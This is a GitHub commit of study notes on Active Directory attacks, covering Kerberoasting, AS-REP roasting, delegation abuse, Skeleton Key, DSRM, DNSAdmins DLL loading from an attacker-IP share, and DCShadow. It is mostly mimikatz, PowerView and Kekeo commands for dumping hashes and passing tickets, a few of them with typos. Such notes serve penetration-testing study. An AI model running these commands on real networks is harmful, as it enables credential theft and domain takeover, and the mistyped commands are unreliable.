Add files via upload

This commit is contained in:
ARZ 2021-12-09 17:11:17 +05:00 committed by GitHub
parent bfdc48cc8f
commit 38f3d51121
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
14 changed files with 414 additions and 0 deletions

View file

@ -0,0 +1,21 @@
# Domain Enumeration - Bloodhound
Bloodhound is useful for gathering AD entities , relationships , it uses graph theory for providing the capability of mapping shortest path for interesting thing , it can find interesting things like `Domain Admins` , it has built-in queries.
https://github.com/BloodHoundAD/BloodHound
## Sharphound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
### Generate archive
```
Invoke-BloodHound -CollectionMethod All
```
### Avoiding detection form Advanced Threat Analytics (ATA)
```
Invoke-BloodHound -CollectionMethod All -ExcludeDC
```

View file

@ -0,0 +1,22 @@
# Domain Persistance - Skeleton key
A Skeleton key is like a malware that is injected into LSASS process of Domain controller (DC), for this to achieve we need to be a domain admin in order to perfrom this , doing this will create a master password for all accounts in a domain ,existing passwords for those account will still work, this attack is done through `mimikatz`. The master password will not change until DC is rebooted
## mimikatz.exe
```
privilege::debug
misc::skeleton
```
## Mimikatz powershell
```
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -Computer computername.domain
```
Then we can just switch to other user
```
Enter-PSSession -ComputerName computername -Credential
```

View file

@ -0,0 +1,65 @@
# Domain Persistance - DSRM
Directory Service Restore Mode (DSRM) , every `Local Administrator` on Domain Controller `DC` is named `Administrator` account , this Administrator is called DSRM account and DSRM password is set when a DC is promoted.
So it is possible to perfrom `Pass The Hash` attack after extracting NTLM hash of Local Administrator account , local administrator password is just a backup password if something goes wrong ,usually local administrator isn't used by DC
## Using mimikatz.exe
```
privilege:debug (to see privileges)
token::elevate (to become NT AUTHORITY\SYSTEM)
```
### Extracting Local Administrator password hash
```
lsadump::sam
```
### Extracting Domain Administrator password hash
```
lsadump::lsa /patch
```
By default DSRM logon is disbaled , value is set to 0 , set the value to 2
```
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbos
```
if this entry doesn't exist , we can create it
```
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
```
Then
```
sekurlsa::pth /user:Administrator /domain:dominname /ntlm:ntlm_hash_of_local_admin
```
## Using mimikatz powershell
This is for local administrator
```
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam""' -Computername computername
```
This is for domain admin
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername computername
```
now performing pass the hash
```
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:domainname /user:Administrator /ntlm:local_admin_hash /run:powershell.exe"'
```
```
Enter-PSsession -Computername computer
```

View file

@ -0,0 +1,2 @@
# Domain Persistance - Custom SSP
SSP stands for Security Support Provider

View file

@ -0,0 +1 @@
# Domain Persistance - ACLs

View file

@ -0,0 +1,2 @@
# Domain Persistance - Security Descriptor

View file

@ -0,0 +1,54 @@
# Domain Privilege Escalation - Kerberoasting
Kerberoasting isn't an exploit or an attack it's abusing feature of windows for authenticating users in AD ,
## Steps in Kerberos
- User logs on with username & password.
- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).
- The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
- **The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.**
- **The TGS is encrypted using the target service accountss NTLM password hash and sent to the user (TGS-REP).**
- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
- Optional mutual authentication is done by service that the user provides TGS ticket to
## Kerberoasting
Ticket Granting Service `TGS` has a server portion which is encrypted with service account's NTLM hash , we can request a TGS for a particular service when we want to connect to it and then cracking the hash , service accounts are usually ignored as passwords aren't changed and they might have some privileges. This can be used to create silver tickets.
In order to do this we need to have a valid domain user and there must be a SPN attached to a user (service account)
## PowerView commands
### Finding usser accounts used as a service account
```
Get-NetUser -SPN
```
### Request a TGS
```
Request -SPNTicket
```
## AD Module
### Finding usser accounts used as a service account
```
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```
### Request a TGS
```
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Toekns.KerberosRequestorSecurityToken -ArgumentList "MSSQLSVC/computername.domainname"
```

View file

@ -0,0 +1,54 @@
# Domain Privilege Escalation - AS REP Roasting
If pre-authentication is disabled on a user account or a service account , meaning that UserAccountControl settings have `Don not require Kerberos preauthentication`, then it is possbile to request a TGT for that user account without any password but a valid username is required
## Steps in Kerberos
- **User logs on with username & password.**
- **Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).**
- **The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.**
- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.
- The TGS is encrypted using the target service accountss NTLM password hash and sent to the user (TGS-REP)
- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
- Optional mutual authentication is done by service that the user provides TGS ticket to
## PowerView (dev)
### Enumerating accounts with Kerberos preauth disabled
```
Get-DomainUser -PreauthNotRequired -Verbose
```
### Request encrypted AS-REP for offline brute force
## AD Module
### Enumerating accounts with Kerberos preauth disabled
```
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```
## ASREP Roast
https://github.com/HarmJ0y/ASREPRoast
### Request encrypted AS-REP for offline brute force
```
Get-ASREPHash -Username user -Verbose
```
### To enumerate all users with kerberos preauth disable and request a hash
```
Invoke-ASREPRoast -Verbose
```

View file

@ -0,0 +1,2 @@
# Domain Privilege Escalation - Set SPN

View file

@ -0,0 +1,126 @@
# Domain Privilege Escalation - Delegation
Kerberos delegation allows to re use user's credentials to access resources hosted on a different server , this is done in mult-tier service where kerberos double hop is required
Delegation could look like this where a user authenticates to web server , web server makes requests to database server but not as web service account but as the user account (that has authenticated)
## Steps in delegation
- User provides credentials to domain controller (DC)
- DC returns a Ticket Granting Ticket (TGT)
- User requests a Ticket Granting Service (TGS) for the service he wants to connects , let's say web service
- User sends TGT and TGS to web server
- Web service account uses the user's TGT to request to another service to use , let's assume database service
- Web server's account connects to database server as the user
## Types of delegations
There are 2 types of delegations
- Unconstrained Delegation
- Constratined Delegation
## Unconstrained Delegation
Unconstrained delegation allows first hop server to request access to any service on any computer in domain
The way this delegation works is that domain controller places Ticket Granting Ticket (TGT) in Ticket Granting Service (TGS) , TGT is extracted from the TGS and TGT is stored in LSASS by the server , this way server can reuse user's TGT to access any resource in the domain as the user.
# PowerView
### Discover domain computers which have unconstrained delegation
```
Get-NetComputer -UnConstrained
```
## AD Module
```
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -e $True}
```
# Mimikatz
After finding that which computer or service has unconstrained delegation enabled , we will need to make a domain admin login to that service/computer and with administrative privileges on that computer we can use mimikatz to list the avaiable tickets in the session , as in unconstrained delegation , TGT will be loaded in LSASS so we can use that to get domain admin
## Check if any domain admin token is available
```
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
```
By running this command we can see a administrator token so use the command below to do `ptt` pass the ticket to load it into the current sessions
```
Invoke-Mimikatz -Command '"kerberos::ptt location_of_the_ticket(C:\Users\user\Documents\ticket_something)"'
```
## Constrained Delegation
Constrained delegation allows first hop to request access to specific services on specific computers. It allows access only to specified services on specified computers as a user.
It doesn't use kerberos when authenticating the user ,when a user authenticates to a web service , and the user requests something from database ,web server makes a requests using the authorized user account, to impersonate the user , `Service For user (S4U) extension is used ` that has two extensions
- Service for user to self (S4U2Self) , it allows a service to obtain forwardable TGS to itself on behalf of a user. This must have `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION`
- Service for User to proxy (S4U2Proxy) , it allows a service to obtain a TGS for second service on behalf of authorized user. This is controlled by `msDS-AllowedToDelegateTo` attribute that contains list of SPNs to which user tokens can be forwarded
## Steps in constrained delegation
- A user authenticates to web serivce using non kerberos authentication mechanism.
- Web service requests a ticket from DC/KDC for the user's account without supplying the password as web service account.
- KDC checks if web service account has `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` attribute and also if the user isn't blocked for delegation , then it forwards a S4U2Self ticket for the user's account.
- Service then passes this ticket back to KDC and a request a service ticket for the another service let's say Database service.
- KDC checks if `msDS-AllowedToDelegateTo` is on the web service account ,if service is listed then it will return the token for database service (S4U2proxy).
- Web service can now authenticate to database service as the user's TGS to that service.
### PowerView (dev)
#### Enumerate users and computers with constrained delegations enabled
```
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```
### AD Module
#### Enumerate users and computers with constrained delegations enabled
```
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -Properties msDS-AllowedToDeleagteTo}
```
### Kekeo.exe
### Using `asktgt` we will first get the TGT of the service account that is allowed to delegate
```
tgt::ask /user:username /domain:domainname /rc4:ntlm_hash_of_user
```
### Using `s4u` , we request a TGS as any user on the service which we have permission to delegate
```
tgs::s4u /tgt:TGS_Ticket_of_service_account /user:Administrator@domainname /service:mssql
```
### Now using mimikatz , we can use pass the ticket to load the ticket in powershell session
```
Invoke-Mimikatz -Command '"kerebros::ptt administrator_ticket"'
```

View file

@ -0,0 +1,39 @@
# Domain Enumeration - DNSAdmins
Members of `DNSAdmins` could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA)
## Powerview
### Enumerate members of DNSAdmins group
```
Get-NetGroupMember -GroupName "DNSAdmins"
```
## AD Module
### Enumerate members of DNSAdmins group
```
Get-ADGroupMember -Identity DNSAdmins
```
### Configure DLL using `dnscmd.exe`
```
dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
```
### Restart dns service
```
sc.exe stop dns
sc.exe sart dns
```
Or alternatively follow this
https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b

View file

@ -0,0 +1,3 @@
# Domain Enumeration - Access Control List
##

View file

@ -0,0 +1,21 @@
# Forest Attacks - Cross Forest Attacks
DCShaodw temporarliy registers a new domain controller in the domain and uses it to push attributes like SIDHistory , SPNs and etc without leaving change logs for objects.
New domain controller is registered by modifying configuration , SPNs of existing computer object and couple of RPC services
## Mimikatz
We need two instances of mimikatz for `DCShadow`
```
!+
!processtoken
lsadump::dcshadow /objec:rootuser /attribute:Description /value="Hello from DCShadow"
```
And the second instance with domain admin privileges
```
lsadump::dcshadow /push
```

View file

@ -0,0 +1,2 @@
# Forest Attacks - Forest Persistence DC Shadow